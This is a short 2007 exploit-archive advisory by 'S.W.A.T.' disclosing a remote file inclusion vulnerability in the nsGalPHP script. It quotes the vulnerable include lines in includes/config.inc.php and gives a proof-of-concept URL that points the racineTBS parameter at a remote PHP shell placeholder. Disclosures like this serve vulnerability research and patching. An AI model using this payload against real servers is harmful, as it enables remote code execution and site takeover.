[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : nsGalPHP (includes/config.inc.php racineTBS) Remote Inclusion Vuln
# Published : 2007-01-27
# Author : S.W.A.T.
# Previous Title : PhP Generic library & framework (include_path) RFI Vulnerability
# Next Title : ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
_________________________________
________| |________
| S.W.A.T. | /
| | /
/ |_________________________________|
/___________) (___________
------------------------------------------------------------------------------------------------------------------------
Script:nsGalPHP
Affected Version:unknown
Downlaoad&Victim:http://www.easy-script.com/compt.php?id=3521
------------------------------------------------------------------------------------------------------------------------
Author:S.W.A.T.
------------------------------------------------------------------------------------------------------------------------
Bug in (includes/config.inc.php)
Vul Code;
include_once($racineTBS.'includes/tbs_class.php');
include_once($racineTBS.'includes/fonctions.inc.php');
require($racineTBS.'lang/'.$config['langueDefaut'].'.php');
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/includes/config.inc.php?racineTBS=[PHPSHELL]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:All Member Of XmorsTEAM
------------------------------------------------------------------------------------------------------------------------
# www.Syue.com [2007-01-27]